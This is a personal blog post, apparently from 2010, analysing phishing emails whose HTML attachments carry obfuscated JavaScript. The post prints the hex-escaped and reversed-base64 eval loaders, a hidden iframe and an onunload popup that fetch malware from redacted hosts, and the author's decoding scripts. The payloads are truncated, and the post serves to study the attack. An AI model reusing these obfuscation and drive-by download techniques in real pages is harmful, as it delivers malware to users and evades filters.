You've got mail-ware!

Early Wednesday morning I received three nearly identical e-mails.  Each had the appearance of SPAM, but not your typical SPAM.  In place of the usual advertisement composed of bad spelling and poor grammar was a well written message crafted to look like an invoice and accompanied by an HTML attachment.  Inspecting the contents of the attachments revealed that each contained identical JavaScript code, which was clearly malicious.  The JavaScript had an appearance similar to that of obfuscated shellcode, with a string of hex values being unescaped and written to the HTML document:

<script language="JavaScript" type="text/javascript">
var i,y,x="202020203c73[...snipped...]726970743e20";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
</script>

Because the Thunderbird mail client, which I was using, does not execute JavaScript and the attachments contained nothing but JavaScript, they appeared inline with the message bodies as empty content.  Since the JavaScript hadn't exectued on my system, I simply mentioned the messages to our network security people and went on with my day.  Eventually, though, I began to get curious about the purpose of the JavaScript.  So, later that evening I decided to investigate.  

First I wrote the following C++ code to decode the encoded string that appeared in the JavaScript:

#include <stdio.h>
#include <stdlib.h>
#include <string>
 
using namespace std;
 
int main()
{
  string s = "202020203c73[...snipped...]726970743e20";
 
  for (int i = 0; i < s.length(); i += 2)
    printf("%c", strtoul(s.substr(i, 2).c_str(), NULL, 16));
  printf("\n");
 
  return 0;
}

 

This provided the following result:

<script src="http://[redacted].com/iframfile.js"></script>

Next I tried to view the content of the encoded URL using wget, but the URL had already been disabled.  The investigation had lead to a dead end, but fortunately I received a similar message Thursday afternoon.  Attached to this message was an HTML file containing similar, but not identical, JavaScript code.  This time the JavaScript was embedded within a form e-mail from Amazon.com containing links to different Amazon.com support pages.  The embedded JavaScript looked like this:

<script language=JavaScript>document.write(unescape('%3Cme%74a h%[...snipped...]2le%3E%0D%0A'))</script>

This time I used the following Python code to decode the encoded string:

import urllib
urllib.unquote('%3Cme%74a h%[...snipped...]2le%3E%0D%0A')

Which yielded the following HTML:

<meta http-equiv="refresh" content="0;url=http://[redacted].co.za/1.html" />\r\n<table width="100%" border="0"><tr bgcolor="#556688" align="center"><td><a href="http://www.pullsoft.com/htmlpower.htm"><font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="-1">This Web Page was protected by HTMLPower,  Click here to Register</font></a></td></tr></table>\r\n

Interestingly enough, this one contained an advertisement for an HTML obfuscation tool whose web page lists protecting addresses from spammers as one of its primary functions.  I again used wget to view the content of the URL, obtaining the following:

PLEASE WAITING.... 4 SECONDS

<meta http-equiv="refresh" content="4;url=http://[redacted].cz.cc/[removeed] />

<iframe width="0" height="0" src="http://[redacted].co.cc/download/?[removed]"></iframe>

Accessing the iframe URL with wget provided:

--2010-09-23 20:40:07--  http://[redacted].co.cc/download/?[removed]
Resolving [redacted].co.cc... 188.65.73.10
Connecting to [redacted].co.cc|188.65.73.10|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: http://www.google.com/404/ [following]
--2010-09-23 20:40:07--  http://www.google.com/404/
Resolving www.google.com... 72.14.204.147, 72.14.204.99, 72.14.204.104, ...
Connecting to www.google.com|72.14.204.147|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2010-09-23 20:40:08 ERROR 404: Not Found.

Interesting that this one redirected to a non-existent page.  This URL was a dead end, but following the other URL provided a much more intriguing result.  It led to a "My Windows Virus Scanner" malware page with some interesting JavaScript code.  First was JavaScript to initiate a file download:

<script type="text/javascript">
<!--//<![CDATA[
var LinkSoftDown = "[removed]";
function ext(){window.open( "[removed]", "_blank", "toolbar=0,titlebar=0,scrollbars=0,status=0,location=0,menubar=0,width=100,height=100,left=0,top=0");}
if (window.attachEvent) eval("window.attachEvent('onunload',ext);");
else window.addEventListener("unload", ext, false);
//]]>-->
</script>

Second was some JavaScript containing a large block of BASE64 encoded data that was decoded and evaluated:

<script type="text/javascript" src="[removed]">
b6 = [A lot of BASE64 encoded data]
var s = BASE64.decode(b6); eval(s.split('').reverse().join(''));
</script>

What was interesting about this encoding was that the plain text had not just been BASE64 encoded, but had been completely reversed.  I used the following Python to reveal the contents of the encoded data:

import base64
base64.b64decode(b6)[::-1]

What I received was more JavaScript to construct a fake virus scanner page.  I never actually executed this code to see what it produced, but I did download the executable (again with wget) referenced by the first JavaScript segment.  I used the UNIX strings command to see if it contained anything interesting.  It did not.  The only human readable string was the info tag from a GIF image, indicating that the image was in the public domain.  Any other text must have been encoded.  

That was as far as I took my little investigation into the messages.  It was the first time I had ever seen this type of obfuscated JavaScript embedded within an e-mail message, and found it to be a fairly clever attempt at bypassing e-mail filters.  I received one final message of this nature this morning.  This one was quite the disappointment as it didn't even bother to obfuscate the HTTP redirect, simply placing the raw text of the meta tag in the attachment.  It was followed by a note from the network security people saying that virus definitions for this particular item had been released, so these messages would no longer be making it past the mail server's virus scanner and I probably shouldn't be seeing any more of them in the future.  

General: 
Programming: